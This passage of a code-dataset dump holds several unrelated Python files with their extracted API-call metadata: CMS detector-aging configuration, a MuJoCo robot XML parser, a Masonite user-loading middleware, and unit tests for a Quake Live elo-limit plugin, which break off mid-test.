setScenarioHLLHC(process.HEDarkeningEP,scenarioHLLHC) hcaldigi = getHcalDigitizer(process) if hcaldigi is not None: hcaldigi.HEDarkening = cms.bool(turnon) if hasattr(process,'es_hardcode'): process.es_hardcode.HERecalibration = cms.bool(turnon) return process def ageHF(process,turnon): hcaldigi = getHcalDigitizer(process) if hcaldigi is not None: hcaldigi.HFDarkening = cms.bool(turnon) if hasattr(process,'es_hardcode'): process.es_hardcode.HFRecalibration = cms.bool(turnon) return process def agedHFNose(process,algo=0): from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HFNose_setEndOfLifeNoise process = HFNose_setEndOfLifeNoise(process,byDose=True,byDoseAlgo=algo) return process def agedHGCal(process,algo=0): from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HGCal_setEndOfLifeNoise process = HGCal_setEndOfLifeNoise(process,byDose=True,byDoseAlgo=algo) return process def realisticHGCalStartup(process): from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HGCal_setRealisticStartupNoise process = HGCal_setRealisticStartupNoise(process) return process # needs lumi to set proper ZS thresholds (tbd) def ageSiPM(process,turnon,lumi): process.es_hardcode.hbUpgrade.doRadiationDamage = turnon process.es_hardcode.heUpgrade.doRadiationDamage = turnon # todo: determine ZS threshold adjustments # adjust PF thresholds for increased noise # based on: https://baylor.box.com/s/w32ja75krcbxcycyifexu28dwlgrj7wg hcal_lumis = [300, 1000, 3000, 4500, 1e10] hcal_thresholds = { 300: { "seed": [0.5, 0.625, 0.75, 0.75], "rec": [0.4, 0.5, 0.6, 0.6], }, 1000: { "seed": [1.0, 1.5, 1.5, 1.5], "rec": [0.8, 1.2, 1.2, 1.2], }, 3000: { "seed": [1.25, 2.5, 2.5, 2.5], "rec": [1.0, 2.0, 2.0, 2.0], }, 4500: { "seed": [1.5, 3.0, 3.0, 3.0], "rec": [1.25, 2.5, 2.5, 2.5], }, } ctmodules = ['calotowermaker','caloTowerForTrk','caloTowerForTrkPreSplitting','towerMaker','towerMakerWithHO'] for ilumi, hcal_lumi in enumerate(hcal_lumis[:-1]): if lumi >= hcal_lumi and lumi < hcal_lumis[ilumi+1]: if hasattr(process,'particleFlowClusterHBHE'): process.particleFlowClusterHBHE.seedFinder.thresholdsByDetector[0].seedingThreshold = hcal_thresholds[hcal_lumi]["seed"] process.particleFlowClusterHBHE.initialClusteringStep.thresholdsByDetector[0].gatheringThreshold = hcal_thresholds[hcal_lumi]["rec"] process.particleFlowClusterHBHE.pfClusterBuilder.recHitEnergyNorms[0].recHitEnergyNorm = hcal_thresholds[hcal_lumi]["rec"] process.particleFlowClusterHBHE.pfClusterBuilder.positionCalc.logWeightDenominatorByDetector[0].logWeightDenominator = hcal_thresholds[hcal_lumi]["rec"] process.particleFlowClusterHBHE.pfClusterBuilder.allCellsPositionCalc.logWeightDenominatorByDetector[0].logWeightDenominator = hcal_thresholds[hcal_lumi]["rec"] if hasattr(process,'particleFlowClusterHCAL'): process.particleFlowClusterHCAL.pfClusterBuilder.allCellsPositionCalc.logWeightDenominatorByDetector[0].logWeightDenominator = hcal_thresholds[hcal_lumi]["rec"] if hasattr(process,'particleFlowRecHitHBHE'): process.particleFlowRecHitHBHE.producers[0].qualityTests[0].cuts[0].threshold = hcal_thresholds[hcal_lumi]["rec"] for ctmod in ctmodules: if hasattr(process,ctmod): getattr(process,ctmod).HBThreshold1 = hcal_thresholds[hcal_lumi]["rec"][0] getattr(process,ctmod).HBThreshold2 = hcal_thresholds[hcal_lumi]["rec"][1] getattr(process,ctmod).HBThreshold = hcal_thresholds[hcal_lumi]["rec"][-1] break return process def ageHcal(process,lumi,instLumi,scenarioHLLHC): hcaldigi = getHcalDigitizer(process) if hcaldigi is not None: hcaldigi.DelivLuminosity = cms.double(float(lumi)) # integrated lumi in fb-1 # these lines need to be further activated by turning on 'complete' aging for HF if hasattr(process,'g4SimHits'): process.g4SimHits.HCalSD.InstLuminosity = cms.double(float(instLumi)) process.g4SimHits.HCalSD.DelivLuminosity = cms.double(float(lumi)) # recalibration and darkening always together if hasattr(process,'es_hardcode'): process.es_hardcode.iLumi = cms.double(float(lumi)) # functions to enable individual subdet aging process = ageHB(process,True,scenarioHLLHC) process = ageHE(process,True,scenarioHLLHC) process = ageHF(process,True) process = ageSiPM(process,True,lumi) return process def turn_on_HB_aging(process): process = ageHB(process,True,"") return process def turn_off_HB_aging(process): process = ageHB(process,False,"") return process def turn_on_HE_aging(process): process = ageHE(process,True,"") return process def turn_off_HE_aging(process): process = ageHE(process,False,"") return process def turn_on_HF_aging(process): process = ageHF(process,True) return process def turn_off_HF_aging(process): process = ageHF(process,False) return process def turn_off_SiPM_aging(process): process = ageSiPM(process,False,0.0) return process def hf_complete_aging(process): if hasattr(process,'g4SimHits'): process.g4SimHits.HCalSD.HFDarkening = cms.untracked.bool(True) hcaldigi = getHcalDigitizer(process) if hcaldigi is not None: hcaldigi.HFDarkening = cms.untracked.bool(False) return process def ageEcal(process,lumi,instLumi): if hasattr(process,'g4SimHits'): #these lines need to be further activiated by tuning on 'complete' aging for ecal process.g4SimHits.ECalSD.InstLuminosity = cms.double(instLumi) process.g4SimHits.ECalSD.DelivLuminosity = cms.double(float(lumi)) # available conditions ecal_lumis = [300,1000,3000,4500] ecal_conditions = [ ['EcalIntercalibConstantsRcd','EcalIntercalibConstants_TL{:d}_upgrade_8deg_v2_mc'], ['EcalIntercalibConstantsMCRcd','EcalIntercalibConstantsMC_TL{:d}_upgrade_8deg_v2_mc'], ['EcalLaserAPDPNRatiosRcd','EcalLaserAPDPNRatios_TL{:d}_upgrade_8deg_mc'], ['EcalPedestalsRcd','EcalPedestals_TL{:d}_upgradeTIA_8deg_mc'], ['EcalTPGLinearizationConstRcd','EcalTPGLinearizationConst_TL{:d}_upgrade_8deg_mc'], ] # update PF thresholds, based on https://indico.cern.ch/event/653123/contributions/2659235/attachments/1491385/2318364/170711_upsg_ledovskoy.pdf ecal_thresholds = { 300 : 0.103, 1000 : 0.175, 3000 : 0.435, 4500 : 0.707, } ecal_seed_multiplier = 2.5 # try to get conditions if int(lumi) in ecal_lumis: if not hasattr(process.GlobalTag,'toGet'): process.GlobalTag.toGet=cms.VPSet() for ecal_condition in ecal_conditions: process.GlobalTag.toGet.append(cms.PSet( record = cms.string(ecal_condition[0]), tag = cms.string(ecal_condition[1].format(int(lumi))), connect = cms.string("frontier://FrontierProd/CMS_CONDITIONS") ) ) if hasattr(process,"particleFlowClusterECALUncorrected"): _seeds = process.particleFlowClusterECALUncorrected.seedFinder.thresholdsByDetector for iseed in range(0,len(_seeds)): if _seeds[iseed].detector.value()=="ECAL_BARREL": _seeds[iseed].seedingThreshold = cms.double(ecal_thresholds[int(lumi)]*ecal_seed_multiplier) _clusters = process.particleFlowClusterECALUncorrected.initialClusteringStep.thresholdsByDetector for icluster in range(0,len(_clusters)): if _clusters[icluster].detector.value()=="ECAL_BARREL": _clusters[icluster].gatheringThreshold = cms.double(ecal_thresholds[int(lumi)]) return process def ecal_complete_aging(process): if hasattr(process,'g4SimHits'): process.g4SimHits.ECalSD.AgeingWithSlopeLY = cms.untracked.bool(True) if hasattr(process,'ecal_digi_parameters'): process.ecal_digi_parameters.UseLCcorrection = cms.untracked.bool(False) return process def customise_aging_300(process): process=ageHcal(process,300,5.0e34,"nominal") process=ageEcal(process,300,5.0e34) return process def customise_aging_1000(process): process=ageHcal(process,1000,5.0e34,"nominal") process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration process=ageEcal(process,1000,5.0e34) return process def customise_aging_3000(process): process=ageHcal(process,3000,5.0e34,"nominal") process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration process=ageEcal(process,3000,5.0e34) process=agedHGCal(process) process=agedHFNose(process) return process def customise_aging_3000_ultimate(process): process=ageHcal(process,3000,7.5e34,"ultimate") process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration process=ageEcal(process,3000,7.5e34) process=agedHGCal(process) process=agedHFNose(process) return process def customise_aging_4500_ultimate(process): process=ageHcal(process,4500,7.5e34,"ultimate") process=turn_off_HE_aging(process) #avoid conflict between HGCal and Hcal in phase2 geom configuration process=ageEcal(process,4500,7.5e34) process=agedHGCal(process) process=agedHFNose(process) return process
[((66, 14, 66, 75), 'SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi.HFNose_setEndOfLifeNoise', 'HFNose_setEndOfLifeNoise', (), '', False, 'from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HFNose_setEndOfLifeNoise\n'), ((71, 14, 71, 74), 'SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi.HGCal_setEndOfLifeNoise', 'HGCal_setEndOfLifeNoise', (), '', False, 'from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HGCal_setEndOfLifeNoise\n'), ((76, 14, 76, 53), 'SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi.HGCal_setRealisticStartupNoise', 'HGCal_setRealisticStartupNoise', ({(76, 45, 76, 52): 'process'}, {}), '(process)', False, 'from SimCalorimetry.HGCalSimProducers.hgcalDigitizer_cfi import HGCal_setRealisticStartupNoise\n'), ((41, 52, 41, 68), 'FWCore.ParameterSet.Config.bool', 'cms.bool', ({(41, 61, 41, 67): 'turnon'}, {}), '(turnon)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((43, 46, 43, 62), 'FWCore.ParameterSet.Config.bool', 'cms.bool', ({(43, 55, 43, 61): 'turnon'}, {}), '(turnon)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((52, 52, 52, 68), 'FWCore.ParameterSet.Config.bool', 'cms.bool', ({(52, 61, 52, 67): 'turnon'}, {}), '(turnon)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((54, 46, 54, 62), 'FWCore.ParameterSet.Config.bool', 'cms.bool', ({(54, 55, 54, 61): 'turnon'}, {}), '(turnon)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((59, 52, 59, 68), 'FWCore.ParameterSet.Config.bool', 'cms.bool', ({(59, 61, 59, 67): 'turnon'}, {}), '(turnon)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((61, 46, 61, 62), 'FWCore.ParameterSet.Config.bool', 'cms.bool', ({(61, 55, 61, 61): 'turnon'}, {}), '(turnon)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((180, 47, 180, 71), 'FWCore.ParameterSet.Config.untracked.bool', 'cms.untracked.bool', ({(180, 66, 180, 70): 'True'}, {}), '(True)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((182, 52, 182, 77), 'FWCore.ParameterSet.Config.untracked.bool', 'cms.untracked.bool', ({(182, 71, 182, 76): 'False'}, {}), '(False)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((188, 50, 188, 70), 'FWCore.ParameterSet.Config.double', 'cms.double', ({(188, 61, 188, 69): 'instLumi'}, {}), '(instLumi)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((235, 53, 235, 77), 'FWCore.ParameterSet.Config.untracked.bool', 'cms.untracked.bool', ({(235, 72, 235, 76): 'True'}, {}), '(True)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((237, 55, 237, 80), 'FWCore.ParameterSet.Config.untracked.bool', 'cms.untracked.bool', ({(237, 74, 237, 79): 'False'}, {}), '(False)', True, 'import FWCore.ParameterSet.Config as cms\n'), ((213, 36, 213, 47), 'FWCore.ParameterSet.Config.VPSet', 'cms.VPSet', ({}, {}), '()', True, 'import FWCore.ParameterSet.Config as cms\n'), ((216, 25, 216, 54), 'FWCore.ParameterSet.Config.string', 'cms.string', ({(216, 36, 216, 53): 'ecal_condition[0]'}, {}), '(ecal_condition[0])', True, 'import FWCore.ParameterSet.Config as cms\n'), ((218, 26, 218, 78), 'FWCore.ParameterSet.Config.string', 'cms.string', ({(218, 37, 218, 77): '"""frontier://FrontierProd/CMS_CONDITIONS"""'}, {}), "('frontier://FrontierProd/CMS_CONDITIONS')", True, 'import FWCore.ParameterSet.Config as cms\n')]
cbschaff/nlimb
xml_parser.py
f0564b00bab1b3367aaa88163e49bebc88f349bb
import numpy as np import xml.etree.ElementTree as ET class Geom(object): def __init__(self, geom): self.xml = geom self.params = [] def get_params(self): return self.params.copy() def set_params(self, new_params): self.params = new_params def update_point(self, p, new_params): pass def update_xml(self): pass def update(self, new_params): self.set_params(new_params) self.update_xml() def get_smallest_z(self): pass def get_param_limits(self): pass def get_param_names(self): pass def get_volume(self): pass class Sphere(Geom): min_radius = .05 max_radius = .4 def __init__(self, geom): self.xml = geom self.params = [float(self.xml.get('size'))] # radius self.center = np.array([float(x) for x in self.xml.get('pos').split()]) def update_point(self, p, new_params): return ((p - self.center) * new_params[0] / self.params[0]) + self.center def update_xml(self): self.xml.set('size', str(self.params[0])) def get_smallest_z(self): return self.center[2] - self.params[0] def get_param_limits(self): return [[self.min_radius], [self.max_radius]] def get_param_names(self): return ['radius'] def get_volume(self): return 4./3. * np.pi * self.params[0] ** 3 class Capsule(Geom): min_length = 0.175 max_length = 0.8 min_radius = 0.035 max_radius = 0.085 def __init__(self, geom): self.xml = geom fromto = [float(x) for x in self.xml.get('fromto').split()] self.p1 = np.array(fromto[:3]) self.p2 = np.array(fromto[3:]) length = np.sqrt(np.sum((self.p2 - self.p1) ** 2)) radius = float(self.xml.get('size')) self.params = [length, radius] self.axis = (self.p2 - self.p1) / length def update_point(self, p, new_params): lfac = p.dot(self.axis) * self.axis rfac = p - lfac return p + lfac * (-1.0 + new_params[0] / self.params[0])# + rfac * (new_params[1] / self.params[1]) def update_xml(self): self.xml.set('fromto', ' '.join([str(x) for x in np.concatenate([self.p1, self.p2])])) self.xml.set('size', str(self.params[1])) # radius def set_params(self, new_params): p1 = self.update_point(self.p1, new_params) p2 = self.update_point(self.p2, new_params) # update only after computing p1, p2 self.p1 = p1 self.p2 = p2 super().set_params(new_params) def get_smallest_z(self): return min(self.p1[2], self.p2[2]) - self.params[1] def get_param_limits(self): return [[self.min_length, self.min_radius], [self.max_length, self.max_radius]] def get_param_names(self): return ['length','radius'] def get_volume(self): return 4./3. * np.pi * self.params[1]**3 + self.params[0] * np.pi * self.params[1]**2 class Body: geoms = {'sphere': Sphere, 'capsule': Capsule} # dictionary of legal geometry types def __init__(self, body, worldbody=False): self.xml = body self.worldbody = worldbody geom_xml = body.find('geom') # assume only one geometry per body self.geom = self.geoms[geom_xml.get('type')](geom_xml) self.joints = [j for j in body.findall('joint') if 'ignore' not in j.get('name')] self.parts = [Body(b) for b in body.findall('body')] pos = [b.get('pos') for b in body.findall('body')] self.part_positions = [np.array([float(x) for x in p.split()]) for p in pos] pos = [j.get('pos') for j in self.joints] self.joint_positions = [np.array([float(x) for x in p.split()]) for p in pos] self.n = len(self.geom.get_params()) self.n_all_params = len(self.get_params()) self.zmin = float(self.xml.get("pos").split()[2]) - self.get_height() def get_height(self): max_height = -self.geom.get_smallest_z() for body, pos in zip(self.parts, self.part_positions): max_height = max(max_height, body.get_height() - pos[2]) return max_height def update_initial_position(self): pos = self.xml.get("pos").split() pos[2] = str(self.get_height() + self.zmin) self.xml.set("pos", ' '.join(pos)) def update_xml(self): for body, pos in zip(self.parts, self.part_positions): body.xml.set('pos', ' '.join([str(x) for x in pos])) for joint, pos in zip(self.joints, self.joint_positions): joint.set('pos', ' '.join([str(x) for x in pos])) def set_body_positions(self, new_params): for i, pos in enumerate(self.part_positions): self.part_positions[i] = self.geom.update_point(pos, new_params) for i, pos in enumerate(self.joint_positions): self.joint_positions[i] = self.geom.update_point(pos, new_params) def update(self, new_params): self.set_body_positions(new_params) self.geom.update(new_params) self.update_xml() def get_params(self): params = self.geom.get_params() for body in self.parts: params += body.get_params() return params def get_param_limits(self): limits = self.geom.get_param_limits() for body in self.parts: body_limits = body.get_param_limits() limits[0] += body_limits[0] limits[1] += body_limits[1] return limits def get_param_names(self): name = self.xml.get('name') param_names = [name + '-' + p for p in self.geom.get_param_names()] for body in self.parts: param_names += body.get_param_names() return param_names def update_params(self, new_params): if self.worldbody: assert len(new_params) == self.n_all_params, "Wrong number of parameters" self.update(new_params[:self.n]) remaining_params = new_params[self.n:] for body in self.parts: remaining_params = body.update_params(remaining_params) if self.worldbody: self.update_initial_position() else: return remaining_params def get_body_names(self): names = [self.xml.get('name')] for body in self.parts: names += body.get_names() return names def get_joints(self): joints = {} for body,pos in zip(self.parts, self.part_positions): for j in body.joints: joints[j.get('name')] = (self.xml.get('name'), body.xml.get('name'), self.geom, body.geom, pos) joints.update(body.get_joints()) return joints def get_volumes(self): volumes = {} if len(self.joints) > 0: for j in self.joints: v1 = self.geom.get_volume() v2 = sum([b.geom.get_volume() for b in self.parts]) volumes[j.get('name')] = np.array((v1, v2)) for body in self.parts: volumes.update(body.get_volumes()) return volumes class MuJoCoXmlRobot: def __init__(self, model_xml): self.model_xml = model_xml self.tree = ET.parse(self.model_xml) worldbody = self.tree.getroot().find('worldbody') self.body = Body(worldbody.find('body'), worldbody=True) def get_params(self): return self.body.get_params() def get_param_limits(self): return self.body.get_param_limits() def get_param_names(self): return self.body.get_param_names() def get_height(self): return self.body.get_height() def get_joints(self): return self.body.get_joints() def get_volumes(self): return self.body.get_volumes() def update(self, params, xml_file=None): if xml_file is None: xml_file = self.model_xml self.body.update_params(list(params)) self.tree.write(xml_file) if __name__ == '__main__': robot = MuJoCoXmlRobot('mujoco_assets/hopper.xml') params = list(1.0 * np.array(robot.get_params())) robot.update(params, 'mujoco_assets/hopper_test.xml') assert robot.get_params() == params #assert robot.get_height() == 1.31 print(robot.get_param_limits()) print(robot.get_param_names()) robot = MuJoCoXmlRobot('mujoco_assets/walker2d.xml') params = [.4,.04,.5,.05,.55,.055,.6,.06,.5,.05,.55,.055,.6,.06] robot.update(params, 'mujoco_assets/walker2d_test.xml') assert robot.get_params() == params assert robot.get_height() == 1.31 print(robot.get_param_limits()) print(robot.get_param_names()) robot = MuJoCoXmlRobot('mujoco_assets/ant.xml') params = [.2, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06] robot.update(params, 'mujoco_assets/ant_test.xml') assert robot.get_params() == params assert robot.get_height() == .2 print(robot.get_param_limits()) print(robot.get_param_names()) robot = MuJoCoXmlRobot('mujoco_assets/humanoid.xml') params = list(.8 * np.array(robot.get_params())) robot.update(params, 'mujoco_assets/humanoid_test.xml') assert robot.get_params() == params print(robot.get_height()) #assert robot.get_height() == .6085 print(robot.get_param_limits()) print(robot.get_param_names()) import gym, roboschool env = gym.make("RoboschoolHopper-v1") env.unwrapped.model_xml = 'mujoco_assets/hopper_test.xml' env.reset() #env.render() import os from scipy.misc import imsave import subprocess as sp outdir = 'xml_vid' os.makedirs(outdir, exist_ok=True) i = 0 for _ in range(10): env.reset() for _ in range(100): env.step(env.action_space.sample()) rgb = env.render('rgb_array') imsave(os.path.join(outdir, '{:05d}.png'.format(i)), rgb) i+=1 sp.call(['ffmpeg', '-r', '60', '-f', 'image2', '-i', os.path.join(outdir, '%05d.png'), '-vcodec', 'libx264', '-pix_fmt', 'yuv420p', os.path.join(outdir, 'out.mp4')]) env.close()
[((282, 10, 282, 41), 'gym.make', 'gym.make', ({(282, 19, 282, 40): '"""RoboschoolHopper-v1"""'}, {}), "('RoboschoolHopper-v1')", False, 'import gym, roboschool\n'), ((290, 4, 290, 38), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((73, 18, 73, 38), 'numpy.array', 'np.array', ({(73, 27, 73, 37): 'fromto[:3]'}, {}), '(fromto[:3])', True, 'import numpy as np\n'), ((74, 18, 74, 38), 'numpy.array', 'np.array', ({(74, 27, 74, 37): 'fromto[3:]'}, {}), '(fromto[3:])', True, 'import numpy as np\n'), ((219, 20, 219, 44), 'xml.etree.ElementTree.parse', 'ET.parse', ({(219, 29, 219, 43): 'self.model_xml'}, {}), '(self.model_xml)', True, 'import xml.etree.ElementTree as ET\n'), ((75, 25, 75, 57), 'numpy.sum', 'np.sum', ({(75, 32, 75, 56): '(self.p2 - self.p1) ** 2'}, {}), '((self.p2 - self.p1) ** 2)', True, 'import numpy as np\n'), ((299, 57, 299, 89), 'os.path.join', 'os.path.join', ({(299, 70, 299, 76): 'outdir', (299, 78, 299, 88): '"""%05d.png"""'}, {}), "(outdir, '%05d.png')", False, 'import os\n'), ((299, 136, 299, 167), 'os.path.join', 'os.path.join', ({(299, 149, 299, 155): 'outdir', (299, 157, 299, 166): '"""out.mp4"""'}, {}), "(outdir, 'out.mp4')", False, 'import os\n'), ((210, 41, 210, 59), 'numpy.array', 'np.array', ({(210, 50, 210, 58): '(v1, v2)'}, {}), '((v1, v2))', True, 'import numpy as np\n'), ((86, 57, 86, 91), 'numpy.concatenate', 'np.concatenate', ({(86, 72, 86, 90): '[self.p1, self.p2]'}, {}), '([self.p1, self.p2])', True, 'import numpy as np\n')]
josephmancuso/masonite-forum
app/http/middleware/LoadUserMiddleware.py
a91c7386f3e0b02b0ac71623eb295a7543cb60fd
''' Load User Middleware''' from masonite.facades.Auth import Auth class LoadUserMiddleware: ''' Middleware class which loads the current user into the request ''' def __init__(self, Request): ''' Inject Any Dependencies From The Service Container ''' self.request = Request def before(self): ''' Run This Middleware Before The Route Executes ''' self.load_user(self.request) return self.request def after(self): ''' Run This Middleware After The Route Executes ''' pass def load_user(self, request): ''' Load user into the request ''' request.set_user(Auth(request).user())
[((22, 25, 22, 38), 'masonite.facades.Auth.Auth', 'Auth', ({(22, 30, 22, 37): 'request'}, {}), '(request)', False, 'from masonite.facades.Auth import Auth\n')]
mgaertne/minqlx-plugin-tests
src/unittest/python/merciful_elo_limit_tests.py
10a827fe063c86481560dcc00a8a3ce2ba60861b
from minqlx_plugin_test import * import logging import unittest from mockito import * from mockito.matchers import * from hamcrest import * from redis import Redis from merciful_elo_limit import * class MercifulEloLimitTests(unittest.TestCase): def setUp(self): setup_plugin() setup_cvars({ "qlx_mercifulelo_minelo": "800", "qlx_mercifulelo_applicationgames": "10", "qlx_mercifulelo_abovegames": "10", "qlx_mercifulelo_daysbanned": "30", "qlx_owner": "42" }) setup_game_in_progress() self.plugin = merciful_elo_limit() self.reply_channel = mocked_channel() self.plugin.database = Redis self.db = mock(Redis) self.plugin._db_instance = self.db when(self.db).__getitem__(any).thenReturn("42") def tearDown(self): unstub() def setup_balance_ratings(self, player_elos): gametype = None if len(player_elos) > 0: gametype = self.plugin.game.type_short ratings = {} for player, elo in player_elos: ratings[player.steam_id] = {gametype: {'elo': elo}} self.plugin._loaded_plugins["balance"] = mock({'ratings': ratings}) def setup_no_balance_plugin(self): if "balance" in self.plugin._loaded_plugins: del self.plugin._loaded_plugins["balance"] def setup_exception_list(self, players): mybalance_plugin = mock(Plugin) mybalance_plugin.exceptions = [player.steam_id for player in players] self.plugin._loaded_plugins["mybalance"] = mybalance_plugin def test_handle_map_change_resets_tracked_player_ids(self): connected_players() self.setup_balance_ratings([]) self.plugin.tracked_player_sids = [123, 455] self.plugin.handle_map_change("campgrounds", "ca") assert_that(self.plugin.tracked_player_sids, is_([])) def test_handle_map_change_resets_announced_player_ids(self): connected_players() self.setup_balance_ratings([]) self.plugin.announced_player_elos = [123, 455] self.plugin.handle_map_change("campgrounds", "ca") assert_that(self.plugin.announced_player_elos, is_([])) def test_handle_map_change_fetches_elos_of_connected_players(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 1200)}) self.plugin.handle_map_change("thunderstruck", "ca") verify(self.plugin._loaded_plugins["balance"]).add_request( {player1.steam_id: 'ca', player2.steam_id: 'ca'}, self.plugin.callback_ratings, CHAT_CHANNEL ) def test_handle_player_connect_fetches_elo_of_connecting_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connecting_player = fake_player(789, "Connecting Player") connected_players(player1, player2, connecting_player) self.setup_balance_ratings({(player1, 900), (player2, 1200), (connecting_player, 1542)}) self.plugin.handle_player_connect(connecting_player) verify(self.plugin._loaded_plugins["balance"]).add_request( {connecting_player.steam_id: 'ca'}, self.plugin.callback_ratings, CHAT_CHANNEL ) def test_fetch_elos_of_players_with_no_game_setup(self): setup_no_game() self.setup_balance_ratings({}) self.plugin.fetch_elos_of_players([]) verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any) def test_fetch_elos_of_players_with_unsupported_gametype(self): setup_game_in_progress("unsupported") self.setup_balance_ratings({}) self.plugin.fetch_elos_of_players([]) verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any) def test_fetch_elos_of_player_with_no_balance_plugin(self): mocked_logger = mock(spec=logging.Logger) spy2(minqlx.get_logger) when(minqlx).get_logger(self.plugin).thenReturn(mocked_logger) self.setup_no_balance_plugin() self.plugin.fetch_elos_of_players([]) verify(mocked_logger).warning(matches("Balance plugin not found.*")) def test_handle_round_countdown_with_no_game(self): setup_no_game() player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Speccing Player", team="spectator") connected_players(player1, player2, player3) self.setup_balance_ratings({}) self.plugin.handle_round_countdown(1) verify(self.plugin._loaded_plugins["balance"], times=0).add_request(any, any, any) def test_handle_round_countdown_fetches_elos_of_players_in_teams(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Speccing Player", team="spectator") connected_players(player1, player2, player3) self.setup_balance_ratings({(player1, 900), (player2, 1200), (player3, 1600)}) self.plugin.handle_round_countdown(4) verify(self.plugin._loaded_plugins["balance"]).add_request( {player1.steam_id: 'ca', player2.steam_id: 'ca'}, self.plugin.callback_ratings, CHAT_CHANNEL ) def test_callback_ratings_with_no_game_running(self): setup_no_game() player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Speccing Player", team="spectator") connected_players(player1, player2, player3) self.setup_balance_ratings({}) self.plugin.callback_ratings([], minqlx.CHAT_CHANNEL) verify(self.db, times=0).get(any) def test_callback_ratings_with_unsupported_game_type(self): setup_game_in_progress("unsupported") player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Speccing Player", team="spectator") connected_players(player1, player2, player3) self.setup_balance_ratings({}) self.plugin.callback_ratings([], minqlx.CHAT_CHANNEL) verify(self.db, times=0).get(any) def test_callback_ratings_warns_low_elo_player(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) patch(minqlx.next_frame, lambda func: func) patch(minqlx.thread, lambda func: func) patch(time.sleep, lambda int: None) when(self.db).get(any).thenReturn("2") self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL) verify(player2, times=12).center_print(matches(".*Skill warning.*8.*matches left.*")) verify(player2).tell(matches(".*Skill Warning.*qlstats.*below.*800.*8.*of 10 application matches.*")) def test_callback_ratings_announces_information_to_other_players(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) patch(minqlx.next_frame, lambda func: func) patch(minqlx.thread, lambda func: func) patch(time.sleep, lambda int: None) when(self.db).get(any).thenReturn("2") self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL) assert_plugin_sent_to_console(matches("Fake Player2.*is below.*, but has.*8.*application matches left.*")) def test_callback_ratings_announces_information_to_other_players_just_once_per_connect(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) self.plugin.announced_player_elos = [456] patch(minqlx.next_frame, lambda func: func) patch(minqlx.thread, lambda func: func) patch(time.sleep, lambda int: None) when(self.db).get(any).thenReturn("2") self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL) assert_plugin_sent_to_console(matches("Player.*is below.*, but has 8 application matches left.*"), times=0) def test_callback_ratings_makes_exception_for_player_in_exception_list(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") player3 = fake_player(789, "Fake Player3", team="red") connected_players(player1, player2, player3) self.setup_balance_ratings({(player1, 900), (player2, 799), (player3, 600)}) self.setup_exception_list([player3]) patch(minqlx.next_frame, lambda func: func) patch(minqlx.thread, lambda func: func) patch(time.sleep, lambda int: None) when(self.db).get(any).thenReturn("2") self.plugin.callback_ratings([player1, player2, player3], minqlx.CHAT_CHANNEL) verify(player2, times=12).center_print(matches(".*Skill warning.*8.*matches left.*")) verify(player2).tell(matches(".*Skill Warning.*qlstats.*below.*800.*8.*of 10 application matches.*")) verify(player3, times=0).center_print(any) verify(player3, times=0).tell(any) def test_callback_ratings_warns_low_elo_player_when_application_games_not_set(self): player1 = fake_player(123, "Fake Player1", team="red") player2 = fake_player(456, "Fake Player2", team="blue") connected_players(player1, player2) self.setup_balance_ratings({(player1, 900), (player2, 799)}) patch(minqlx.next_frame, lambda func: func) patch(minqlx.thread, lambda func: func) patch(time.sleep, lambda int: None) when(self.db).get(any).thenReturn(None) self.plugin.callback_ratings([player1, player2], minqlx.CHAT_CHANNEL) verify(player2, times=12).center_print(matches(".*Skill warning.*10.*matches left.*")) verify(player2).tell(matches(".*Skill Warning.*qlstats.*below.*800.*10.*of 10 application matches.*")) def test_callback_ratings_bans_low_elo_players_that_used_up_their_application_games(self): player1 = fake_player(123, "Fake Player1", 